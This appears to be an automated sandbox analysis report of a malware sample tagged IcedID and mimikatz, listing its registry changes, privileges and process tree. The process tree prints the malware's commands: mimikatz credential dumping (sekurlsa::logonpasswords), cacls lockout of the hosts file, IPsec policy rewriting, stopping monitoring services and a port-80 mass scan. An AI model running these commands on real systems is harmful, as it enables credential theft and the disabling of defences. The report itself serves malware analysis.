cmd.execmd.exenet.exebwayqfivf.exenetsh.exenetsh.exenetsh.exenetsh.exesc.exenet1.exehmdriy.execmd.exenet1.exesc.exenet.exenet.exenetsh.exenet.exeschtasks.exenetsh.exeuidzkei.exenetsh.execmd.exenetsh.exenetsh.exenet1.execmd.exenetsh.exenetsh.execmd.exenet.execmd.exesc.execmd.exenet1.execmd.execmd.exenet1.exenet1.execmd.execmd.exenet1.execmd.exenetsh.exenetsh.exe2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exeschtasks.exenetsh.exenetsh.exenet1.execmd.execacls.execmd.exewpcap.exenet1.execmd.execmd.execacls.execmd.execmd.execacls.execmd.execmd.exenet.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bwayqfivf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hmdriy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uidzkei.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 1728 cmd.exe 4888 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x00070000000234b9-6.dat nsis_installer_2 behavioral2/files/0x00110000000234ca-15.dat nsis_installer_1 behavioral2/files/0x00110000000234ca-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
Processes:
viwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeuidzkei.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" uidzkei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" uidzkei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" uidzkei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing uidzkei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ uidzkei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" uidzkei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump viwlddied.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" viwlddied.exe -
Modifies registry class 14 IoCs
Processes:
uidzkei.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" uidzkei.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3784 schtasks.exe 4292 schtasks.exe 4652 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
uidzkei.exepid Process 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exepid Process 1364 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exeuidzkei.exeuidzkei.exevfshost.exeviwlddied.exeizlpad.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exedescription pid Process Token: SeDebugPrivilege 1364 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1468 uidzkei.exe Token: SeDebugPrivilege 1480 uidzkei.exe Token: SeDebugPrivilege 1316 vfshost.exe Token: SeDebugPrivilege 4980 viwlddied.exe Token: SeLockMemoryPrivilege 1492 izlpad.exe Token: SeLockMemoryPrivilege 1492 izlpad.exe Token: SeDebugPrivilege 2416 viwlddied.exe Token: SeDebugPrivilege 4800 viwlddied.exe Token: SeDebugPrivilege 3280 viwlddied.exe Token: SeDebugPrivilege 4812 viwlddied.exe Token: SeDebugPrivilege 3512 viwlddied.exe Token: SeDebugPrivilege 3720 viwlddied.exe Token: SeDebugPrivilege 1744 viwlddied.exe Token: SeDebugPrivilege 696 viwlddied.exe Token: SeDebugPrivilege 4652 viwlddied.exe Token: SeDebugPrivilege 1268 viwlddied.exe Token: SeDebugPrivilege 3536 viwlddied.exe Token: SeDebugPrivilege 1908 viwlddied.exe Token: SeDebugPrivilege 3488 viwlddied.exe Token: SeDebugPrivilege 1812 viwlddied.exe Token: SeDebugPrivilege 3796 viwlddied.exe Token: SeDebugPrivilege 2600 viwlddied.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exeuidzkei.exeuidzkei.exexohudmc.exehmdriy.exeuidzkei.exeuidzkei.exepid Process 1364 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe 1364 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe 1468 uidzkei.exe 1468 uidzkei.exe 1480 uidzkei.exe 1480 uidzkei.exe 2984 xohudmc.exe 2468 hmdriy.exe 4616 uidzkei.exe 4616 uidzkei.exe 4484 uidzkei.exe 4484 uidzkei.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.execmd.exeuidzkei.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 1364 wrote to memory of 1728 1364 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe 82 PID 1364 wrote to memory of 1728 1364 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe 82 PID 1364 wrote to memory of 1728 1364 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe 82 PID 1728 wrote to memory of 4888 1728 cmd.exe 84 PID 1728 wrote to memory of 4888 1728 cmd.exe 84 PID 1728 wrote to memory of 4888 1728 cmd.exe 84 PID 1728 wrote to memory of 1468 1728 cmd.exe 85 PID 1728 wrote to memory of 1468 1728 cmd.exe 85 PID 1728 wrote to memory of 1468 1728 cmd.exe 85 PID 1480 wrote to memory of 4044 1480 uidzkei.exe 87 PID 1480 wrote to memory of 4044 1480 uidzkei.exe 87 PID 1480 wrote to memory of 4044 1480 uidzkei.exe 87 PID 4044 wrote to memory of 2984 4044 cmd.exe 89 PID 4044 wrote to memory of 2984 4044 cmd.exe 89 PID 4044 wrote to memory of 2984 4044 cmd.exe 89 PID 4044 wrote to memory of 3692 4044 cmd.exe 90 PID 4044 wrote to memory of 3692 4044 cmd.exe 90 PID 4044 wrote to memory of 3692 4044 cmd.exe 90 PID 4044 wrote to memory of 3120 4044 cmd.exe 91 PID 4044 wrote to memory of 3120 4044 cmd.exe 91 PID 4044 wrote to memory of 3120 4044 cmd.exe 91 PID 4044 wrote to memory of 2064 4044 cmd.exe 92 PID 4044 wrote to memory of 2064 4044 cmd.exe 92 PID 4044 wrote to memory of 2064 4044 cmd.exe 92 PID 4044 wrote to memory of 3144 4044 cmd.exe 93 PID 4044 wrote to memory of 3144 4044 cmd.exe 93 PID 4044 wrote to memory of 3144 4044 cmd.exe 93 PID 4044 wrote to memory of 716 4044 cmd.exe 94 PID 4044 wrote to memory of 716 4044 cmd.exe 94 PID 4044 wrote to memory of 716 4044 cmd.exe 94 PID 1480 wrote to memory of 3200 1480 uidzkei.exe 98 PID 1480 wrote to memory of 3200 1480 uidzkei.exe 98 PID 1480 wrote to memory of 3200 1480 uidzkei.exe 98 PID 1480 wrote to memory of 2644 1480 uidzkei.exe 101 PID 1480 wrote to memory of 2644 1480 uidzkei.exe 101 PID 1480 wrote to memory of 2644 1480 uidzkei.exe 101 PID 1480 wrote to memory of 1908 1480 uidzkei.exe 103 PID 1480 wrote to memory of 1908 1480 uidzkei.exe 103 PID 1480 wrote to memory of 1908 1480 uidzkei.exe 103 PID 1480 wrote to memory of 656 1480 uidzkei.exe 108 PID 1480 wrote to memory of 656 1480 uidzkei.exe 108 PID 1480 wrote to memory of 656 1480 uidzkei.exe 108 PID 656 wrote to memory of 724 656 cmd.exe 110 PID 656 wrote to memory of 724 656 cmd.exe 110 PID 656 wrote to memory of 724 656 cmd.exe 110 PID 724 wrote to memory of 4012 724 wpcap.exe 111 PID 724 wrote to memory of 4012 724 wpcap.exe 111 PID 724 wrote to memory of 4012 724 wpcap.exe 111 PID 4012 wrote to memory of 1560 4012 net.exe 113 PID 4012 wrote to memory of 1560 4012 net.exe 113 PID 4012 wrote to memory of 1560 4012 net.exe 113 PID 724 wrote to memory of 4800 724 wpcap.exe 114 PID 724 wrote to memory of 4800 724 wpcap.exe 114 PID 724 wrote to memory of 4800 724 wpcap.exe 114 PID 4800 wrote to memory of 1952 4800 net.exe 116 PID 4800 wrote to memory of 1952 4800 net.exe 116 PID 4800 wrote to memory of 1952 4800 net.exe 116 PID 724 wrote to memory of 1812 724 wpcap.exe 117 PID 724 wrote to memory of 1812 724 wpcap.exe 117 PID 724 wrote to memory of 1812 724 wpcap.exe 117 PID 1812 wrote to memory of 2504 1812 net.exe 119 PID 1812 wrote to memory of 2504 1812 net.exe 119 PID 1812 wrote to memory of 2504 1812 net.exe 119 PID 724 wrote to memory of 2012 724 wpcap.exe 120
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2156
-
C:\Windows\TEMP\bszweruve\izlpad.exe"C:\Windows\TEMP\bszweruve\izlpad.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tlgtansf\uidzkei.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4888
-
-
C:\Windows\tlgtansf\uidzkei.exeC:\Windows\tlgtansf\uidzkei.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1468
-
-
-
C:\Windows\tlgtansf\uidzkei.exeC:\Windows\tlgtansf\uidzkei.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2984
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3120
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3144
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:716
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2644
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1908
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iyczurqrb\sdpfffren\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\iyczurqrb\sdpfffren\wpcap.exeC:\Windows\iyczurqrb\sdpfffren\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1560
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2504
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:456
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3768 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1276
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1180 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1968 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3696
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iyczurqrb\sdpfffren\bwayqfivf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iyczurqrb\sdpfffren\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1344 -
C:\Windows\iyczurqrb\sdpfffren\bwayqfivf.exeC:\Windows\iyczurqrb\sdpfffren\bwayqfivf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iyczurqrb\sdpfffren\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\iyczurqrb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\iyczurqrb\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4836 -
C:\Windows\iyczurqrb\Corporate\vfshost.exeC:\Windows\iyczurqrb\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
-
